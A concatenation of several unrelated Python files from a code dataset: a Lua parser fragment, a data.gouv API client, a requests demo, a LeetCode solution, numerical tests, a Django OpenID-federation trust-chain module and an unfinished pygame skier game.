if token.kind not in self.binops:
raise Exception("syntax error near '%s'" % token)
bin_op, op_right = self.parse_exp(prev_priority)
return bin_op, ast.BinopExp(op_left, op_right, token.kind)
def parse_number_exp(self):
token = self.lex.next_token_of_kind(lexer.TokenKind.NUMBER)
val = eval(token.data)
if isinstance(val, int):
return ast.IntegerExp(val)
else:
return ast.FloatExp(val)
# retstat ::= return [explist] [‘;’]
def parse_retstat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_RETURN)
exp_list = []
token = self.lex.look_ahead()
if not self.is_block_end(token.kind) and token.kind != lexer.TokenKind.SEP_SEMI:
exp_list = self.parse_exp_list()
return ast.RetStat(exp_list)
# block ::= {stat} [retstat]
def parse_block(self):
stats = self.parse_stats()
block = ast.Block(stats)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_RETURN:
retstat = self.parse_retstat()
block.append_stat(retstat)
return block
def parse_goto_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_GOTO)
label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
return ast.GotoStat(label)
def parse_do_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.DoStat(block)
def parse_while_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_WHILE)
exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.WhileStat(exp, block)
def parse_repeat_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_REPEAT)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_UNTIL)
exp = self.parse_exp(0)[1]
return ast.RepeatStat(exp, block)
def parse_if_stat(self):
exp_list = []
block_list = []
self.lex.next_token_of_kind(lexer.TokenKind.KW_IF)
exp = self.parse_exp(0)[1]
exp_list.append(exp)
self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
block = self.parse_block()
block_list.append(block)
while self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSEIF:
self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSEIF)
exp_list.append(self.parse_exp(0)[1])
self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
block_list.append(self.parse_block())
if self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSE:
self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSE)
exp_list.append(ast.BoolConstExp(True))
block_list.append(self.parse_block())
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.IfStat(exp_list, block_list)
def parse_for_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FOR)
name = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
return self.finish_for_num_stat(name)
else:
return self.finish_for_in_stat(name)
def finish_for_num_stat(self, var):
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
init_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_COMMA)
limit_exp = self.parse_exp(0)[1]
step_exp = None
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
step_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.ForNumStat(var, init_exp, limit_exp, step_exp, block)
def finish_for_in_stat(self, name):
var_list = self.parse_name_list(name)
self.lex.next_token_of_kind(lexer.TokenKind.KW_IN)
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.ForInStat(var_list, exp_list, block)
def parse_func_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_name_exp, has_colon = self.parse_func_name_exp()
func_body_exp = self.parse_func_body_exp(has_colon)
return ast.AssignStat([func_name_exp], [func_body_exp])
# parlist ::= namelist [‘,’ ‘...’] | ‘...’
# namelist ::= Name {‘,’ Name}
def parse_parlist(self):
parlist = []
is_var_arg = False
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RPAREN:
return parlist, is_var_arg
if self.lex.look_ahead().kind == lexer.TokenKind.VARARG:
is_var_arg = True
self.lex.next_token()
return parlist, is_var_arg
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
if self.lex.look_ahead().kind == lexer.TokenKind.IDENTIFIER:
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
else:
self.lex.next_token_of_kind(lexer.TokenKind.VARARG)
is_var_arg = True
break
return parlist, is_var_arg
# funcbody ::= ‘(’ [parlist] ‘)’ block end
def parse_func_body_exp(self, has_colon):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LPAREN)
parlist, is_var_arg = self.parse_parlist()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
if has_colon:
parlist.insert(0, ast.StringExp('self'))
body = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.FunctionDefExp(parlist, is_var_arg, body)
# funcname ::= Name {‘.’ Name} [‘:’ Name]
def parse_func_name_exp(self):
has_colon = False
name_exp = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_DOT:
self.lex.next_token()
name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COLON:
self.lex.next_token()
name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
has_colon = True
return name_exp, has_colon
def parse_local_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_LOCAL)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_local_func_def_stat()
else:
return self.parse_local_var_decl_stat()
# namelist ::= Name {‘,’ Name}
def parse_name_list(self, name=None):
if name:
var_list = [name]
else:
var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
var_list.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
return var_list
# local function Name funcbody
def parse_local_func_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
exp_list = [self.parse_func_body_exp(False)]
return ast.LocalDeclStat(var_list, exp_list)
# local namelist [‘=’ explist]
def parse_local_var_decl_stat(self):
var_list = self.parse_name_list()
exp_list = []
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
exp_list = self.parse_exp_list()
return ast.LocalDeclStat(var_list, exp_list)
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
# functioncall ::= prefixexp args | prefixexp ‘:’ Name args
# prefixexp ::= var | functioncall | ‘(’ exp ‘)’
# prefixexp ::= prefixexp args
# | prefixexp ‘:’ Name args
# | prefixexp ‘[’ exp ‘]’
# | prefixexp ‘.’ Name
# | ‘(’ exp ‘)’
# | Name
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_prefix_exp(self):
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
else:
name = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
exp = ast.NameExp(name.data)
while True:
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.SEP_DOT:
self.lex.next_token()
idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
exp = ast.TableAccessExp(exp, idx_exp)
elif look_token.kind == lexer.TokenKind.SEP_COLON:
self.lex.next_token()
args_exp = [exp]
idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
exp = ast.TableAccessExp(exp, idx_exp)
args_exp.extend(self.parse_func_args())
exp = ast.FunctionCallExp(exp, args_exp)
elif look_token.kind in [lexer.TokenKind.SEP_LPAREN, lexer.TokenKind.SEP_LCURLY, lexer.TokenKind.STRING]:
args_exp = self.parse_func_args()
exp = ast.FunctionCallExp(exp, args_exp)
elif look_token.kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
idx_exp = self.parse_exp(0)[1]
exp = ast.TableAccessExp(exp, idx_exp)
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
else:
break
return exp
# varlist ‘=’ explist
# functioncall
def parse_assign_or_func_call_stat(self):
exp = self.parse_prefix_exp()
look_token = self.lex.look_ahead()
if look_token.kind in [lexer.TokenKind.OP_ASSIGN, lexer.TokenKind.SEP_COMMA]:
return self.finsh_assign_stat(exp)
elif isinstance(exp, ast.FunctionCallExp):
return exp
else:
raise Exception("syntax error near '%s'" % look_token)
def check_var(self, exp):
if isinstance(exp, ast.TableAccessExp) or isinstance(exp, ast.NameExp):
return exp
raise Exception("syntax error near '%s'" % token)
# varlist ‘=’ explist
# varlist ::= var {‘,’ var}
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
def finsh_assign_stat(self, first_var):
var_list = [first_var]
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
var_list.append(self.check_var(self.parse_prefix_exp()))
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
exp_list = self.parse_exp_list()
return ast.AssignStat(var_list, exp_list)
"""
stat ::= ‘;’ |
break |
::Name:: |
goto Name |
do block end |
while exp do block end |
repeat block until exp |
if exp then block {elseif exp then block} [else block] end |
for Name ‘=’ exp ‘,’ exp [‘,’ exp] do block end |
for namelist in explist do block end |
function funcname funcbody |
local function Name funcbody |
local namelist [‘=’ explist]
varlist ‘=’ explist |
functioncall
"""
def parse_stat(self):
token = self.lex.look_ahead()
if token.kind == lexer.TokenKind.SEP_SEMI:
return self.parse_empty_stat()
elif token.kind == lexer.TokenKind.KW_BREAK:
return self.parse_break_stat()
elif token.kind == lexer.TokenKind.SEP_LABEL:
return self.parse_label_stat()
elif token.kind == lexer.TokenKind.KW_GOTO:
return self.parse_goto_stat()
elif token.kind == lexer.TokenKind.KW_DO:
return self.parse_do_stat()
elif token.kind == lexer.TokenKind.KW_WHILE:
return self.parse_while_stat()
elif token.kind == lexer.TokenKind.KW_REPEAT:
return self.parse_repeat_stat()
elif token.kind == lexer.TokenKind.KW_IF:
return self.parse_if_stat()
elif token.kind == lexer.TokenKind.KW_FOR:
return self.parse_for_stat()
elif token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_stat()
elif token.kind == lexer.TokenKind.KW_LOCAL:
return self.parse_local_def_stat()
else:
return self.parse_assign_or_func_call_stat()
def parse_empty_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_SEMI)
def parse_break_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_BREAK)
return ast.BreakStat()
def parse_label_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL)
return ast.LabelStat(label)
def parse_stats(self):
stats = []
while not self.is_block_end(self.lex.look_ahead().kind):
stat = self.parse_stat()
if stat:
stats.append(stat)
return stats
def is_block_end(self, kind):
if kind in self.block_end_tokens:
return True
return False | StarcoderdataPython |
1783604 | <filename>gtfs_converter/datagouv.py
import os
import requests
import logging
DATAGOUV_API = os.environ["DATAGOUV_API"]
TRANSPORT_ORGANIZATION_ID = os.environ["TRANSPORT_ORGANIZATION_ID"]
DATAGOUV_API_KEY = os.environ["DATAGOUV_API_KEY"]
ORIGINAL_URL_KEY = "transport:original_resource_url"
def delete_community_resources(dataset_id, resources_id):
"""
delete the community resources
"""
headers = {"X-API-KEY": DATAGOUV_API_KEY}
url = f"{DATAGOUV_API}/datasets/community_resources/{resources_id}"
logging.info(
"deleting a community resource %s on dataset %s", resources_id, dataset_id
)
ret = requests.delete(url, params={"dataset": dataset_id}, headers=headers)
if ret.status_code == 404:
# it's ok if the resource has already been deleted
return
ret.raise_for_status()
def get_dataset_detail(dataset_id):
ret = requests.get(f"{DATAGOUV_API}/datasets/{dataset_id}/")
ret.raise_for_status()
return ret.json()
def get_transport_community_resources(dataset_id):
"""
get all community resources for a dataset
"""
url = f"{DATAGOUV_API}/datasets/community_resources/"
ret = requests.get(
url, params={"dataset": dataset_id, "organization": TRANSPORT_ORGANIZATION_ID}
)
ret.raise_for_status()
data = ret.json()["data"]
return data
def create_community_resource(dataset_id, cr_file):
"""
Creates a community resource and uploads the file
This call will not link the resource. It requires and extra call
"""
logging.debug("Creating a community resource on dataset %s", dataset_id)
headers = {"X-API-KEY": DATAGOUV_API_KEY}
files = {"file": open(cr_file, "rb")}
url = f"{DATAGOUV_API}/datasets/{dataset_id}/upload/community/"
ret = requests.post(url, headers=headers, files=files)
ret.raise_for_status()
json = ret.json()
logging.debug(
"Created a new community resource %s on dataset %s", json["id"], dataset_id
)
return json
def update_resource(dataset_id, resource_id, new_file, metadata):
"""
Update a new file to a data.gouv resource, and set its metadata
"""
logging.debug("Updating a resource on dataset %s", dataset_id)
url = f"{DATAGOUV_API}/datasets/{dataset_id}/resources/{resource_id}/upload/"
headers = {"X-API-KEY": DATAGOUV_API_KEY}
files = {"file": open(new_file, "rb")}
ret = requests.post(url, headers=headers, files=files)
ret.raise_for_status()
updated_resource_json = ret.json()
# after the upload, we set the resource metadata
new_resource = {**metadata, "id": resource_id}
logging.debug("Updating metadata of resource %s", resource_id)
url = f"{DATAGOUV_API}/datasets/{dataset_id}/resources/{resource_id}/"
ret = requests.put(url, headers=headers, json=new_resource)
ret.raise_for_status()
logging.debug("Updating of resource %s done", resource_id)
| StarcoderdataPython |
1682233 | import requests
api_url = "https://jsonplaceholder.typicode.com/todos/10"
response = requests.get(api_url)
print(response.json())
response = requests.delete(api_url)
print(response.json())
print(response.status_code) | StarcoderdataPython |
3268507 | <gh_stars>1-10
#
# @lc app=leetcode id=20 lang=python3
#
# [20] Valid Parentheses
#
# https://leetcode.com/problems/valid-parentheses/description/
#
# algorithms
# Easy (39.76%)
# Likes: 6909
# Dislikes: 286
# Total Accepted: 1.3M
# Total Submissions: 3.3M
# Testcase Example: '"()"'
#
# Given a string s containing just the characters '(', ')', '{', '}', '[' and
# ']', determine if the input string is valid.
#
# An input string is valid if:
#
#
# Open brackets must be closed by the same type of brackets.
# Open brackets must be closed in the correct order.
#
#
#
# Example 1:
#
#
# Input: s = "()"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "()[]{}"
# Output: true
#
#
# Example 3:
#
#
# Input: s = "(]"
# Output: false
#
#
# Example 4:
#
#
# Input: s = "([)]"
# Output: false
#
#
# Example 5:
#
#
# Input: s = "{[]}"
# Output: true
#
#
#
# Constraints:
#
#
# 1 <= s.length <= 10^4
# s consists of parentheses only '()[]{}'.
#
#
#
# @lc code=start
class Solution:
def isValid(self, s: str) -> bool:
if not s or len(s) == 0:
return True
stack = []
for i in range(len(s)):
if s[i] == '(' or s[i] == '[' or s[i] == '{':
stack.append(s[i])
else:
if len(stack) == 0:
return False
if ( s[i] == ')' and stack[-1] != '(' ) or ( s[i] == ']' and stack[-1] != '[' ) or ( s[i] == '}' and stack[-1] != '{' ):
return False
stack.pop()
return len(stack) == 0
# @lc code=end
| StarcoderdataPython |
128036 | <reponame>zhaokai0402/PyQt5-Study<gh_stars>0
import math
# -*- coding:utf-8 -*-
if __name__ == '__main__':
length = float(input("length: "))
print("squares:", length ** 2)
print("cubes:", length ** 3)
print("circles:", math.pi * length ** 2)
print("squares:", 4.0 / 3.0 * length ** 3 * math.pi)
| StarcoderdataPython |
163574 | <reponame>parkerwray/smuthi-1
# -*- coding: utf-8 -*-
"""Test spherical_functions"""
import smuthi.utility.math
import numpy as np
from sympy.physics.quantum.spin import Rotation
def test_wignerd():
l_test = 5
m_test = -3
m_prime_test = 4
beta_test = 0.64
wigd = smuthi.utility.math.wigner_d(l_test, m_test, m_prime_test, beta_test, wdsympy=False)
wigd_sympy = complex(Rotation.d(l_test, m_test, m_prime_test, beta_test).doit()).real
err = abs((wigd - wigd_sympy) / wigd)
assert err < 1e-10
def test_Plm_against_prototype():
lmax = 3
omega = 2 * 3.14 / 550
kp = omega * np.array([0.01, 0.2, 0.7, 0.99, 1.2, 2 - 0.5j])
kz = np.sqrt(omega ** 2 - kp ** 2 + 0j)
kz[kz.imag < 0] = -kz[kz.imag < 0]
ct = kz / omega
st = kp / omega
plm, pilm, taulm = smuthi.utility.math.legendre_normalized(ct, st, lmax)
# P_3^0
np.testing.assert_almost_equal(plm[3][0][0], 1.870267465826245)
np.testing.assert_almost_equal(plm[3][0][1], 1.649727250184103)
np.testing.assert_almost_equal(plm[3][0][2], -0.300608757357466)
np.testing.assert_almost_equal(plm[3][0][3], -0.382739631607606)
np.testing.assert_almost_equal(plm[3][0][4], - 3.226515147957620j)
np.testing.assert_almost_equal(plm[3][0][5], -25.338383323084539 - 22.141864985871653j)
# P_2^1
np.testing.assert_almost_equal(plm[2][1][0], 0.019363948460993)
np.testing.assert_almost_equal(plm[2][1][1], 0.379473319220206)
np.testing.assert_almost_equal(plm[2][1][2], 0.968052168015753)
np.testing.assert_almost_equal(plm[2][1][3], 0.270444009917026)
np.testing.assert_almost_equal(plm[2][1][4], 1.541427909439815j)
np.testing.assert_almost_equal(plm[2][1][5], 3.906499971729346 + 6.239600710712296j)
# pi_2^1
np.testing.assert_almost_equal(pilm[2][1][0], 1.936394846099318)
np.testing.assert_almost_equal(pilm[2][1][1], 1.897366596101028)
np.testing.assert_almost_equal(pilm[2][1][2], 1.382931668593933)
np.testing.assert_almost_equal(pilm[2][1][3], 0.273175767592955)
np.testing.assert_almost_equal(pilm[2][1][4], 1.284523257866512j)
np.testing.assert_almost_equal(pilm[2][1][5], 1.104282256024128 + 3.395870919362181j)
# tau_3^2
np.testing.assert_almost_equal(taulm[3][2][0], 0.051227068616724)
np.testing.assert_almost_equal(taulm[3][2][1], 0.963213372000203)
np.testing.assert_almost_equal(taulm[3][2][2], 0.950404683542753)
np.testing.assert_almost_equal(taulm[3][2][3], -2.384713931794872)
np.testing.assert_almost_equal(taulm[3][2][4], -7.131877733107878)
np.testing.assert_almost_equal(taulm[3][2][5], -39.706934218093430 + 42.588889121019569j)
def test_jn_against_prototype():
n = 4
z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
jnz = smuthi.utility.math.spherical_bessel(n, z)
np.testing.assert_almost_equal(jnz[0], 1.058196248205502e-11)
np.testing.assert_almost_equal(jnz[1], 0.014079392762915)
np.testing.assert_almost_equal(jnz[2], 0.187017655344890)
np.testing.assert_almost_equal(jnz[3], 0.013925330885893 + 0.002550081632129j)
np.testing.assert_almost_equal(jnz[4], 0.055554281414152 - 0.011718427699962j)
np.testing.assert_almost_equal(jnz[5], 5.430299683226971e+06 - 3.884383001639664e+06j)
def test_hn_against_prototype():
n = 4
z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
hnz = smuthi.utility.math.spherical_hankel(n, z)
# np.testing.assert_almost_equal(hnz[0], 9.562028025173189e-05 - 1.050007500037500e+12j) this test fails - protype incorrect?
np.testing.assert_almost_equal(hnz[1], 0.014079392762917 - 4.461291526363127j)
np.testing.assert_almost_equal(hnz[2], 0.187017655344889 - 0.186615531479296j)
np.testing.assert_almost_equal(hnz[3], -0.937540374646528 - 4.322684701489512j)
np.testing.assert_almost_equal(hnz[4], 0.254757423766403 - 0.894658828739464j)
np.testing.assert_almost_equal(hnz[5], 5.349924210583894e-11 - 7.680177127921456e-11j)
def test_dxxj_against_prototype():
n = 4
z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
dxxj = smuthi.utility.math.dx_xj(n, z)
np.testing.assert_almost_equal(dxxj[0], 5.290971621054867e-11)
np.testing.assert_almost_equal(dxxj[1], 0.065126624274088)
np.testing.assert_almost_equal(dxxj[2], 0.401032469441925)
np.testing.assert_almost_equal(dxxj[3], 0.064527362367182 + 0.011261758715092j)
np.testing.assert_almost_equal(dxxj[4], 0.230875079050277 - 0.041423344864749j)
np.testing.assert_almost_equal(dxxj[5], 3.329872586039824e+07 - 1.858505295737451e+08j)
def test_dxxh_against_prototype():
n = 4
z = np.array([0.01, 2, 5, 2+0.1j, 3-0.2j, 20+20j])
dxxh = smuthi.utility.math.dx_xh(n, z)
#np.testing.assert_almost_equal(dxxh[0], -3.824801872151283e-04 + 4.200015000000000e+12j)
np.testing.assert_almost_equal(dxxh[1], 0.065126624274084 +14.876432990566345j)
np.testing.assert_almost_equal(dxxh[2], 0.401032469441923 + 0.669247576352214j)
np.testing.assert_almost_equal(dxxh[3], 3.574345443512018 +14.372976166070977j)
np.testing.assert_almost_equal(dxxh[4], -0.423459406818455 + 1.976243655979050j)
np.testing.assert_almost_equal(dxxh[5], 4.344741738782320e-10 + 2.612636745427169e-09j)
def test_dxxj_against_j():
n = 3
eps = 1e-8
z0 = 0.5
z = np.array([z0, z0 + eps, z0 - eps])
jn = smuthi.utility.math.spherical_bessel(n, z)
dxxj = smuthi.utility.math.dx_xj(n, z)
d1 = dxxj[0]
d2 = ((z0 + eps) * jn[1] - (z0 - eps) * jn[2]) / 2 / eps
np.testing.assert_almost_equal(d1, d2)
def test_dxxh_against_h():
n = 3
eps = 1e-10
z0 = 0.5
z = np.array([z0, z0 + eps, z0 - eps])
hn = smuthi.utility.math.spherical_hankel(n, z)
dxxh = smuthi.utility.math.dx_xh(n, z)
d1 = dxxh[0]
d2 = ((z0 + eps) * hn[1] - (z0 - eps) * hn[2]) / 2 / eps
assert (d1 - d2) / d1 < 1e-5
if __name__ == '__main__':
test_wignerd()
test_dxxh_against_h()
test_dxxh_against_prototype()
test_dxxj_against_j()
test_dxxj_against_prototype()
test_hn_against_prototype()
test_jn_against_prototype()
test_Plm_against_prototype()
| StarcoderdataPython |
13784 | import logging
from django.utils import timezone
from typing import Union
from .exceptions import InvalidTrustchain, TrustchainMissingMetadata
from .models import FetchedEntityStatement, TrustChain
from .statements import EntityConfiguration, get_entity_configurations
from .settings import HTTPC_PARAMS
from .trust_chain import TrustChainBuilder
from .utils import datetime_from_timestamp
logger = logging.getLogger(__name__)
def trust_chain_builder(
subject: str,
trust_anchor: EntityConfiguration,
httpc_params: dict = HTTPC_PARAMS,
required_trust_marks: list = []
) -> Union[TrustChainBuilder, bool]:
"""
Trust Chain builder
"""
tc = TrustChainBuilder(
subject,
trust_anchor=trust_anchor,
required_trust_marks=required_trust_marks,
httpc_params=httpc_params
)
tc.start()
if not tc.is_valid:
logger.error(
"The tree of trust cannot be validated for "
f"{tc.subject}: {tc.tree_of_trust}"
)
return False
else:
return tc
def dumps_statements_from_trust_chain_to_db(trust_chain: TrustChainBuilder) -> list:
entity_statements = []
for stat in trust_chain.trust_path:
data = dict(
exp=datetime_from_timestamp(stat.payload["exp"]),
iat=datetime_from_timestamp(stat.payload["iat"]),
statement=stat.payload,
jwt=stat.jwt,
)
fes = FetchedEntityStatement.objects.filter(sub=stat.sub, iss=stat.iss)
if fes:
fes.update(**data)
else:
fes = FetchedEntityStatement.objects.create(
sub=stat.sub, iss=stat.iss, **data
)
entity_statements.append(fes)
if stat.verified_descendant_statements:
for desc_stat_sub in stat.verified_descendant_statements:
payload = stat.verified_descendant_statements[desc_stat_sub]
jwt = stat.verified_descendant_statements_as_jwt[desc_stat_sub]
_data = dict(
exp=datetime_from_timestamp(payload["exp"]),
iat=datetime_from_timestamp(payload["iat"]),
statement=payload,
jwt=jwt,
)
desc_fes = FetchedEntityStatement.objects.filter(
sub=payload["sub"], iss=payload["iss"]
)
if desc_fes:
desc_fes.update(**_data)
else:
desc_fes = FetchedEntityStatement.objects.create(
sub=payload["sub"], iss=payload["iss"], **_data
)
entity_statements.append(desc_fes)
return entity_statements
def get_or_create_trust_chain(
subject: str,
trust_anchor: str,
httpc_params: dict = HTTPC_PARAMS,
required_trust_marks: list = [],
force: bool = False,
) -> Union[TrustChain, None]:
"""
returns a TrustChain model object if any available
if available it return it
if not available it create a new one
if available and expired it return the expired one
if flag force is set to True -> renew the trust chain, update it and
return the updated one
"""
fetched_trust_anchor = FetchedEntityStatement.objects.filter(
sub=trust_anchor, iss=trust_anchor
)
if not fetched_trust_anchor or fetched_trust_anchor.first().is_expired or force:
jwts = get_entity_configurations([trust_anchor], httpc_params=httpc_params)
ta_conf = EntityConfiguration(jwts[0], httpc_params=httpc_params)
data = dict(
exp=datetime_from_timestamp(ta_conf.payload["exp"]),
iat=datetime_from_timestamp(ta_conf.payload["iat"]),
statement=ta_conf.payload,
jwt=ta_conf.jwt,
)
if not fetched_trust_anchor:
# trust to the anchor should be absolute trusted!
# ta_conf.validate_by_itself()
fetched_trust_anchor = FetchedEntityStatement.objects.create(
sub=ta_conf.sub, iss=ta_conf.iss, **data
)
else:
fetched_trust_anchor.update(
exp=datetime_from_timestamp(ta_conf.payload["exp"]),
iat=datetime_from_timestamp(ta_conf.payload["iat"]),
statement=ta_conf.payload,
jwt=ta_conf.jwt,
)
fetched_trust_anchor = fetched_trust_anchor.first()
else:
fetched_trust_anchor = fetched_trust_anchor.first()
ta_conf = fetched_trust_anchor.get_entity_configuration_as_obj()
tc = TrustChain.objects.filter(sub=subject, trust_anchor__sub=trust_anchor).first()
if tc and not tc.is_active:
# if manualy disabled by staff
return None
elif force or not tc or tc.is_expired:
trust_chain = trust_chain_builder(
subject=subject,
trust_anchor=ta_conf,
required_trust_marks=required_trust_marks
)
if not trust_chain:
raise InvalidTrustchain(
f"Trust chain for subject {subject} and "
f"trust_anchor {trust_anchor} is not found"
)
elif not trust_chain.is_valid:
raise InvalidTrustchain(
f"Trust chain for subject {subject} and "
f"trust_anchor {trust_anchor} is not valid"
)
elif not trust_chain.final_metadata:
raise TrustchainMissingMetadata(
f"Trust chain for subject {subject} and "
f"trust_anchor {trust_anchor} doesn't have any metadata"
)
dumps_statements_from_trust_chain_to_db(trust_chain)
tc = TrustChain.objects.filter(
sub=subject, trust_anchor__sub=trust_anchor
)
data = dict(
exp=trust_chain.exp_datetime,
processing_start = timezone.localtime(),
chain=trust_chain.serialize(),
metadata=trust_chain.final_metadata,
parties_involved=[i.sub for i in trust_chain.trust_path],
status="valid",
trust_marks=[
{"id": i.id, "trust_mark": i.jwt}
for i in trust_chain.verified_trust_marks
],
is_active=True,
)
if tc:
tc.update(**data)
tc = tc.first()
else:
tc = TrustChain.objects.create(
sub=subject,
trust_anchor=fetched_trust_anchor,
**data,
)
return tc
| StarcoderdataPython |
1770832 | #!/usr/bin/python
import pygame, sys, random
skier_images=["skier_down.png", "skier_right1.png", "skier_right2.png", "skier_left2.png", "skier_left1.png"]
class SkierClass(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("skier_down.png")
self.rect = self.image.get_rect()
self.rect.center = [320, 100]
self.angle = 0
def turn(self, direction):
self.angle = self.angle + direction
if self.angle < -2:
self.angle = -2
if self.angle > 2:
self.angle = 2
center = self.rect.center
self.image = pygame.image.load(skier_images[self.angle]) # you missed a ")" here
self.rect = self.image.get_rect()
self.rect.center = center
speed = [self.angle, 6 - abs(self.angle)*2]
return speed
def move(self, speed):
self.rect.centerx=self.rect.centerx+speed[0]
if self.rect.centerx < 20: self.rect.centerx = 20
if self.rect.centerx > 620: self.rect.centerx = 620
class ObstacleClass(pygame.sprite.Sprite):
def __init__(self, image_file, location, type): # typo of location, you input lacation
pygame.sprite.Sprite.__init__(self)
self.image_file = image_file
self.image = pygame.image.load(image_file)
self.rect = self.image.get_rect()
self.rect.center = location
self.type = type
self.passed = False
def update(self):
global speed
self.rect.centery -= speed[1]
if self.rect.centery < -32:
self.kill()
def create_map():
global obstacles
locations = []
for i in range(10):
row = random.randint(0, 9)
col = random.randint(0, 9)
location = [col * 64+20, row*64 + 20 + 640]
if not (location in locations): # typo of location, you input lacation
locations.append(location)
type = random.choice(["tree", "flag"])
if type == "tree":
img = "skier_tree.png"
elif type == "flag":
img = "skier_flag.png"
obstacle = ObstacleClass(img, location, type)
obstacles.add(obstacle) #typo of obstacles, you input obstacle
def animate():
screen.fill([255, 255, 255])
obstacles.draw(screen)
screen.blit(skier.image, skier.rect)
screen.blit(score_text, [10, 10]) # missed the closing ")" again
pygame.display.flip()
pygame.init()
screen = pygame.display.set_mode([640, 640])
clock = pygame.time.Clock()
skier = SkierClass()
speed = [0, 6]
obstacles = pygame.sprite.Group()
map_position = 0
points = 0
create_map()
font = pygame.font.Font(None, 50)
running = True
while running:
clock.tick(30)
for event in pygame.event.get():
if event.type == pygame.QUIT: # typo of QUIT, you input QIUT
running = False
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RIGHT:
speed = skier.turn(-1)
